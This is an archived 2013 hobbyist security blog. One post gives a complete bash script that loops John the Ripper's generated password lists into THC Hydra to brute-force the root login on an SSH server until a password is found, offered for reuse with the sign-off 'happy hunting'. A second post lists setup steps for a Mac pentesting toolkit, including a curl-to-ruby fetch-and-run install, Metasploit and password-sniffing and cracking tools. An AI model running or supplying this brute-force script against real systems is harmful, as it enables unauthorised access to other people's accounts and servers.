Friday, June 21, 2013
I hate downloading WordLists
1. Introduction
You most definetly know of THC Hydra ... well i love the tool problem is ...Hydra don’t digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before start the brute-force attack. And so, you are limited by your memory size plus i hate downloading the darn wordlists or dictionaries well why... takes to much time changes every now and then... and my internet speed sometimes sucks and the bundles lord the bundles.....so here is my tune up.... why dont we use two tools
HYDRA and John The Ripper
It’s OK with an usual password dictionary, but you could want more. Something like passwords list generated by “John the ripper” (John provides greats way to generate passwords: digit/alpha/special chars only, “rules” options, “external” filters, etc.)
Our goal is to use the output of John the ripper with Hydra.
The method is trivial but does the job.
loop
(1) Generate random passwords with John the Ripper in a file durring few seconds (file grow up very quickly).
Keep a john's session file.
(2) Run hydra with the passwords file.
(3) If found, exit. if not, continue the session created in (1).
end loop
2. The script
This is the bash script I wrote to perform the task.
· Review ‘hydra_*‘ variables (if need run ‘hydra –help’). See: ‘hydra_host‘, ‘hydra_port‘, ‘hydra_module‘, … and maybe ‘hydra_all_params‘.
· Review ‘john_*‘ variables. See: ‘john_all_params‘ and choose your template : (–incremental:All, –incremental:Digits , –incremental:Alpha , –single, –rules …) see john.conf file to get the list.
Enjoy!
Get hydra-john.sh
#!/bin/sh
hydra="/usr/local/bin/hydra"
john="/usr/bin/john"
hydra_module="ssh2"
hydra_host="127.0.0.1"
hydra_port="22"
hydra_nb_task="10"
hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "
john_sessionfile="$1"
john_all_params="--incremental:Alpha --stdout"
john_time_step=20 # time (seconds) to run john
tmp_passwd="/tmp/pwd1234.tmp"
hydra_logfile="/tmp/hydralog"
if [ "$1" = "" ];then
echo "Usage: $0 <john session file>"
exit 0
fi
#for lfile in `ls $loginfiles*`;do
while [ 1 ];do
# generate some password with john the ripper
echo; echo "- Start (re)generating passwords with John"
if [ -e "$john_sessionfile.rec" ];then
# if session exist, restore it
$john --restore=$john_sessionfile > $tmp_passwd &
else
# if session not exist yet, create it
$john $john_all_params --session=$john_sessionfile > $tmp_passwd &
fi
# wait 100 seconds, then kill john and start hydra on it
echo "- Wait ..."
sleep $john_time_step
echo "- Kill john"
killall john 2>/dev/null 1>/dev/null
sleep 1
# start hydra
echo; echo "- Start hydra"; echo
rm -f $hydra_logfile
echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"
$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile
# if a valid pair has been found, stop the loop
if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then
echo; echo "FOUND !!"
grep $hydra_module $hydra_logfile | grep -v DATA
exit 0
fi
done
happy hunting ... oops learning .... p.s to check out this trick with a proxy(tor) check this site...am here fuu
Mac OSX and penetration Testing
I' am a MacBook/MacOSx user and i love pentesting ...problem is Mac doesnt have a Pentest enviroment unless i do a VM with my FreeBSD with tools.... aside from that i love custom tools so i also have custom tools either by my hand or from others....
Setting up a Pen-Testing environment on your Mac
Download and install Xcode
Open Xcode > Preferences > Download > Install Command line tools
Open Terminal:
> java
Install it.
Install Homebrew (fuck macports)
> ruby -e "$(curl -fsSkL raw.github.com/mxcl/homebrew/go)"
Run BrewDoctor (may need to fix your .bash_profile $PATH
> brew doctor
Install nmap and nping
> brew install nmap
> brew install ruby
> brew install postgresql (if you prefer mysql: brew install mysql)
Startup PGSQL
> initdb /usr/local/var/postgres
> createuser msf -P -h localhost
> createdb -O msf msf -h localhost
Install Metasploit gems
> gem install pg sqlite3 msgpack hpricot
Setup VNC Viewer for MSF
> echo '#!/usr/bin/env bash' >> /usr/local/bin/vncviewer
> echo open vnc://\$1 >> /usr/local/bin/vncviewer
> chmod +x /usr/local/bin/vncviewer
Install Metasploit (from repository)
Select the directory to install metasploit (ex: ~/tools)
> git clone git://github.com/rapid7/metasploit-framework.git
Additional Tools:
brew install dsniff (Password Sniffer)
brew install ettercap (MitM made easy)
brew install aircrack (Wifi Suite)
brew install john (John the Ripper)
brew install hydra (Brute Force Cracker)
brew install ophcrack (Rainbow Table Cracker)
brew install skipfish (WebApp Scanner)
"tcpdump" and "netcat" are pre-installed with OSX (don't over look them )
Download and install BurpSuite free
http://www.portswigger.net/burp/download.html
Subscribe to:
Posts (Atom)
ARCHIVED
:) No longer posting, all articles should be treated as archived and outdated
-
BTS------------Base Transiever Station GSM-----------Global System for Mobile Communications, originally Group Spécial Mobile OsmocomBB---...
-
Requirements: OsmocomBB compatible phone (Motorola c113/115/118/123) CP2102 cable (can be found here ) TyphonOS (read this is you ha...